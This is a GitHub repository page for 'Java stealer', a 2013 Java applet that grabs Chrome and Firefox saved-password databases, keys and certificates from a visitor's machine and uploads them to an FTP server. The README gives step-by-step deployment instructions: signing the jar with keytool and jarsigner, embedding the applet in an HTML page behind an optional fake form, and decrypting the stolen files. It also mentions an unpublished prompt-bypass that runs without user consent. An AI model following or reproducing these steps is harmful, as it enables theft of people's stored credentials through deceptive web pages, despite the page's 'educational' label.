Skip to content

java code to get stored chrome and firefox database

Notifications You must be signed in to change notification settings

bellaj/Java_stealer

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Java stealer

Java stealer is a simple Java applet that fetch for the chrome and Firefox stored passwords database. It upload ths sqlite files with the keys and Certificates to an ftp server and decrypt(function omitted from the github) the data.

Instructions

To use this applet follow these instruction :

1- compile the code and generate .class
2- generate the keys : keytool -genkey -alias your_Alias
3- Sign your jar file : jarsigner -verbose your_applet.jar your_allias
4- include the applet in an HTML page.
<html> <APPLET CODE=”applet/Jform.class” WIDTH=”100%” HEIGHT=600px> <!-- you could insert a fake form --> </html>
once the user display the applet send the databases to the FTP server with the needed files : if you want to decrypt them you could use a sqlite decryptor software. e.g decryptor written in python

NB : This code is outdated (2013) and Java applets are no longer supported in the latest chrome browser, switch to another browser or to an old version (https://www.java.com/fr/download/faq/chrome.xml).
Important : The original code (omitted from the github) has a function that bypass the applet prompt and launch automatically the applet without the users agreement (Java 7). This code was written as a prof of concept and for an educational purpose.

About

java code to get stored chrome and firefox database

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages